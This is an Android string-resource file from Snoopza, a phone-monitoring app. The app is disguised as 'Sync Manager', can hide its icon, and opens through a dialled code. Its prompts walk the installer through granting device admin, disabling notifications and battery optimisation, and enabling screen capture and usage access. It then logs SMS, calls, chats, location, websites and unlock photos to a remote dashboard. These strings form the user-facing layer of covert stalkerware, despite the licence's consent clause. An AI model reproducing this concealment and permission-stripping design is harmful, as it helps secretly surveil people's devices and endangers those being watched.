<resources>
    <string name="abc_action_bar_home_description">Navigate home</string>
    <string name="abc_action_bar_up_description">Navigate up</string>
    <string name="abc_action_menu_overflow_description">More options</string>
    <string name="abc_action_mode_done">Done</string>
    <string name="abc_activity_chooser_view_see_all">See all</string>
    <string name="abc_activitychooserview_choose_application">Choose an app</string>
    <string name="abc_capital_off">OFF</string>
    <string name="abc_capital_on">ON</string>
    <string name="abc_font_family_body_1_material">sans-serif</string>
    <string name="abc_font_family_body_2_material">sans-serif-medium</string>
    <string name="abc_font_family_button_material">sans-serif-medium</string>
    <string name="abc_font_family_caption_material">sans-serif</string>
    <string name="abc_font_family_display_1_material">sans-serif</string>
    <string name="abc_font_family_display_2_material">sans-serif</string>
    <string name="abc_font_family_display_3_material">sans-serif</string>
    <string name="abc_font_family_display_4_material">sans-serif-light</string>
    <string name="abc_font_family_headline_material">sans-serif</string>
    <string name="abc_font_family_menu_material">sans-serif</string>
    <string name="abc_font_family_subhead_material">sans-serif</string>
    <string name="abc_font_family_title_material">sans-serif-medium</string>
    <string name="abc_search_hint">Search…</string>
    <string name="abc_searchview_description_clear">Clear query</string>
    <string name="abc_searchview_description_query">Search query</string>
    <string name="abc_searchview_description_search">Search</string>
    <string name="abc_searchview_description_submit">Submit query</string>
    <string name="abc_searchview_description_voice">Voice search</string>
    <string name="abc_shareactionprovider_share_with">Share with</string>
    <string name="abc_shareactionprovider_share_with_application">Share with %s</string>
    <string name="abc_toolbar_collapse_description">Collapse</string>
    <string name="calendar_allday">All day</string>
    <string name="calendar_beg">from</string>
    <string name="calendar_end">to</string>
    <string name="dialog_acc_descr">"Activate this feature. 

Activating this feature will allow App to supervise web and search activity."</string>
    <string name="dialog_activate">Activate</string>
    <string name="dialog_activation_ok">Activation complete</string>
    <string name="dialog_admin">Please activate \"Device admin\" to increase %1$s protection</string>
    <string name="dialog_admin_off">\"Device admin\" is still disabled!</string>
    <string name="dialog_battery_optim">Please stop Optimise battery usage for correct app working</string>
    <string name="dialog_battery_optim_on">Optimise battery usage is still enabled!</string>
    <string name="dialog_battery_optim_set">":
 - Change \"Not optimized\" to \"All apps\" item
 - Find and deactivate \"%1$s\" app
 - Tap \"Back\" button"</string>
    <string name="dialog_email_test">Send test email</string>
    <string name="dialog_install_not_now">Not now</string>
    <string name="dialog_install_ok">Logs will be available in your dashboard on</string>
    <string name="dialog_install_ok_title">Installation complete</string>
    <string name="dialog_install_reboot">Reboot</string>
    <string name="dialog_install_soon">in a few minutes.</string>
    <string name="dialog_install_sys">Device reboot is needed to protect %1$s app. Reboot now?</string>
    <string name="dialog_new_pin">App PIN:</string>
    <string name="dialog_new_pin_fog">to open application. If you forgot PIN, you can find it in your dashboard.</string>
    <string name="dialog_new_pin_rem">Remember App PIN:</string>
    <string name="dialog_no">No</string>
    <string name="dialog_no_internet">"Internet connection is not available now.
Please check Internet connection to finish activation"</string>
    <string name="dialog_ok">OK</string>
    <string name="dialog_perm_app">"Please activate all app permissions:
 - Open \"Permissions\" item
 - Activate all permissions"</string>
    <string name="dialog_perm_app_off">Some app permissions is still disabled!</string>
    <string name="dialog_perm_notif">Please disable app notifications</string>
    <string name="dialog_perm_notif_on">App notifications is still enabled!</string>
    <string name="dialog_perm_overlay">Please activate \"Appear on top\" permission to get Screenshots and Unlock Selfies</string>
    <string name="dialog_perm_overlay_off">\"Appear on top\" permission is still disabled!</string>
    <string name="dialog_perm_scr">"Please allow %1$s to capture screen to get screenshots:
 - Enable \"Don't show again\" item
 - Tap \"Start now\" button"</string>
    <string name="dialog_perm_scr_off">Screen capturing is still disabled!</string>
    <string name="dialog_perm_usage">"Please activate \"Usage data access\" permission to get screenshots:
 - Find and tap \"%1$s\" app
 - Enable Usage access
 - Tap \"Back\" button twice"</string>
    <string name="dialog_perm_usage_off">\"Usage data access\" permission is still disabled!</string>
    <string name="dialog_pin_current">Current PIN</string>
    <string name="dialog_pin_retype">Retype PIN</string>
    <string name="dialog_pin_specify">New PIN</string>
    <string name="dialog_remember_pin">"Remember it to open application.
If you forgot PIN, you can find it in your dashboard."</string>
    <string name="dialog_run_app">To open hidden app dial:</string>
    <string name="dialog_run_app_sticker">To open hidden App use \"Sticker\" widget</string>
    <string name="dialog_uninstall">Uninstalling</string>
    <string name="dialog_uninstall_ask">Do you want to uninstall Monitor?</string>
    <string name="dialog_update">Update</string>
    <string name="dialog_wait">Please Wait…</string>
    <string name="dialog_yes">Yes</string>
    <string name="email_call_in">Incoming</string>
    <string name="email_call_miss">Missed</string>
    <string name="email_call_out">Outgoing</string>
    <string name="email_call_voice">Voice mail</string>
    <string name="email_cap_call">Call</string>
    <string name="email_cap_contact">Contact</string>
    <string name="email_cap_duration">Duration</string>
    <string name="email_contact_adr">addresses</string>
    <string name="email_contact_email">emails</string>
    <string name="email_contact_notes">notes</string>
    <string name="email_contact_num">numbers</string>
    <string name="email_contact_wrk">work</string>
    <string name="email_coord_acc">Accuracy</string>
    <string name="email_coord_cell">Cell</string>
    <string name="email_coord_dist">m.</string>
    <string name="email_coord_gps">Gps</string>
    <string name="email_coord_time">Time</string>
    <string name="email_coord_url">Url</string>
    <string name="email_coord_via">Via</string>
    <string name="email_coord_wifi">Wi-Fi</string>
    <string name="email_imsi">IMSI</string>
    <string name="email_log">%1$s Log</string>
    <string name="email_me">Me</string>
    <string name="email_msg_alarm">Subscription expires after %1$s.</string>
    <string name="email_msg_alarm_renew">"
Please renew your subscription:
"</string>
    <string name="email_msg_alarm_stop">Subscription has expired.</string>
    <string name="email_msg_alarm_stop_logs">Paid reports will be discarded unless you start a subscription.</string>
    <string name="email_msg_buy">Buy Now</string>
    <string name="email_not_set">Not set</string>
    <string name="email_number">Number</string>
    <string name="email_operator">Operator</string>
    <string name="email_sms_all">All sms</string>
    <string name="email_sms_draft">Draft</string>
    <string name="email_sms_err">Failed</string>
    <string name="email_sms_from">from</string>
    <string name="email_sms_in">Inbox</string>
    <string name="email_sms_ob">Outbox</string>
    <string name="email_sms_out">Sent</string>
    <string name="email_sms_que">Queued</string>
    <string name="email_test">Test message</string>
    <string name="event_count">Count</string>
    <string name="event_name">Event</string>
    <string name="general_password">PIN to open application</string>
    <string name="global_app_name">Sync Manager</string>
    <string name="global_buy_url">http://snoopza.com/buynow</string>
    <string name="global_name">Snoopza</string>
    <string name="global_shared_settings">settings</string>
    <string name="hint_change_pin_new">Enter new PIN</string>
    <string name="hint_change_pin_retype">Retype new PIN</string>
    <string name="hint_enter_deliv_email">Send recipient email</string>
    <string name="hint_enter_email">Enter email</string>
    <string name="hint_enter_password">Enter password</string>
    <string name="hint_enter_pin">Enter PIN</string>
    <string name="hint_enter_smtp_port">Enter SMTP port</string>
    <string name="hint_enter_smtp_server">Enter SMTP server</string>
    <string name="hint_retype_pin">Retype PIN</string>
    <string name="inst_Header">Do you want to install %1$s?</string>
    <string name="inst_Text">This device events will be recorded and uploaded to your %1$s account:</string>
    <string name="inst_Url">my.snoopza.com</string>
    <string name="inst_accept">I accept</string>
    <string name="inst_account_information">Please login to your %1$s account:</string>
    <string name="inst_decline">I decline</string>
    <string name="inst_pin_to_settings">Set app PIN</string>
    <string name="inst_select_Text">"I'm going to use this software to monitor:"</string>
    <string name="inst_select_employee">Employee device</string>
    <string name="inst_select_kids">"My kid's device"</string>
    <string name="inst_select_own">My own device</string>
    <string name="inst_sett_all">All logs</string>
    <string name="inst_sett_calendar">Calendar</string>
    <string name="inst_sett_calls">Calls logs/recording</string>
    <string name="inst_sett_chats">Chats messages/screenshots</string>
    <string name="inst_sett_contacts">Contacts</string>
    <string name="inst_sett_location">Location</string>
    <string name="inst_sett_screenshots">Scheduled screenshots</string>
    <string name="inst_sett_sim">Sim Card change log</string>
    <string name="inst_sett_sites">Websites history/screenshots</string>
    <string name="inst_sett_sms">Sms/Mms messages/screenshots</string>
    <string name="inst_sett_system">System events</string>
    <string name="inst_sett_text">Select logs to monitor:</string>
    <string name="inst_sett_text_bot">You can change it in your Dashboard later.</string>
    <string name="inst_sett_unlock">Unlock Photos</string>
    <string name="license_agree">By installing or using %1$s software you agree to be bound by all of the following terms:</string>
    <string name="license_read">I have read and understood the terms</string>
    <string name="license_terms">Legal Terms</string>
    <string name="license_text"><b>1.</b>" You are aware that this software can record, store and transmit information about device usage and its user activity. 
 
"<b>2.</b>" You are allowed to use this software only under the following conditions: 
You are using this software on a device that you own and personally use; 
You have explicit written consent of the owner and all users of the device to be monitored; 
You are a legal guardian of the user of the device to be monitored; 
 
"<b>3.</b> You know and comply with the laws and regulations that cover privacy, confidentiality and the use of such monitoring software in your jurisdiction. You assume full responsibility for installing or using the software. Developers, sellers or distributors of the software cannot be held responsible for any legal violations or consequences that result from you installing or using the software.</string>
    <string name="menu_hide_icon">Hide %1$s icon</string>
</resources>